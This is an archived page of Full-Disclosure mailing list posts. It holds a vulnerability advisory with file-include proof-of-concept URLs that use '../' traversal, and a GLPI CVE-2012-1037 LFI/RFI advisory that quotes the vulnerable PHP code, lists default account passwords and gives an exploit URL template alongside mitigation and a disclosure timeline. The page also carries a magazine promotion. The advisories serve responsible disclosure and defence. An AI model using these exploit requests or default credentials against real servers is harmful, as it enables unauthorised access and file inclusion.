http://xxx.com/document.php?modulepart=project&file=../[FILE INCLUDE
VULNERABILITY!]

http://xxx.com/comm/action/fiche.php?action=create&actioncode=AC_RDV&contactid=1&socid=1&backtopage=../common/[FILE
INCLUDE VULNERABILITY!]

Risk:
=====
The security riks of the file include vulnerabilities are estimated as high(+).

Credits:
========
Vulnerability Research Laboratory - Benjamin Kunz Mejri & Ucha Gobejishvili (longrifle0x) 

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab
disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the
possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so
the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, of this file requires
authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other
rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

    						Copyright © 2011|Vulnerability-Lab

--

-- 
Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
Contact: admin <at> vulnerability-lab.com or support <at> vulnerability-lab.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
Emilien Girault | 10 Feb 11:40
Favicon
Gravatar

CVE-2012-1037: GLPI <= 0.80.61 LFI/RFI

CVE-2012-1037: GLPI <= 0.80.61 LFI/RFI

Severity: Important

Vendor: GLPI - http://www.glpi-project.org

Versions Affected
=================

All versions between 0.78 and 0.80.61

Description
===========

GLPI fails to properly sanitize the GET 'sub_type' parameter in the front/popup.php file:

  [...]
  checkLoginUser();

  if (isset($_GET["popup"])) {
     $_SESSION["glpipopup"]["name"] = $_GET["popup"];
  }

  if (isset($_SESSION["glpipopup"]["name"])) {
    switch ($_SESSION["glpipopup"]["name"]) {
  [...]
    case "add_ruleparameter" :
           popHeader($LANG['ldap'][35], $_SERVER['PHP_SELF']);
           include strtolower($_GET['sub_type']."Parameter.php");   // <======= 
           break;
  [...]

To be triggered, the attacker needs to be authenticated. However, GLPI provides default accounts that
often aren't changed or disabled:

    glpi/glpi
    tech/tech
    normal/normal
    post-only/postonly

Impact
======

Since there is a suffix, the vulnerability can be used as a RFI (requires allow_url_include = On).

For LFI, the target file has to end up with "parameter.php". GLPI automatically escapes all GET and POST
parameters with addslashes(), so the null byte technique is not usable. I have not tested exploitation
using path truncation technique but it might be possible.

Mitigation
==========

Upgrade to GLPI 0.80.7.

Exploit
=======

http://<server>/front/popup.php?popup=add_ruleparameter&sub_type=<file>

Timeline
========

08 feb 2012 - Found the bug.
09 feb 2012 - Contacted the GLPI Team.
09 feb 2012 - Bug fixed & new version available.

Thanks to the GLPI team for being responsive!

References
==========

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1037
https://forge.indepnet.net/projects/glpi/versions/685
https://forge.indepnet.net/projects/glpi/repository/revisions/17457/diff/branches/0.80-bugfixes/front/popup.php

--

-- 
Emilien Girault

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |
headers
Maciej Kozuszek | 10 Feb 11:32
Picon

Celebrate with PenTest Magazine

Celebrate with PenTest Magazine

To celebrate the transformation of PenTest StarterKit edition into 
Auditing & Standards PenTest, we've decided to give everyone access to 4 
full PenTest issues for free

All you need to do to download them is create a free account. Sign up as 
a free member here:

http://pentestmag.com/subscribe/

And after you activate your account, download all the issues here (click 
"Full version download" button):

PenTest StarterKit (3 issues):
http://pentestmag.com/pentest-starterkit-111/
http://pentestmag.com/pentest-starterkit-211-2/
http://pentestmag.com/pentest-starterkit-12012/
+
Special Social-Engineer.com PenTest Issue:
http://pentestmag.com/social-engineering-pentest-092012/

Enjoy the PenTest Fiesta!

PenTest Team
en <at> pentestmag.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Permalink | Reply | 0 comments |

Gmane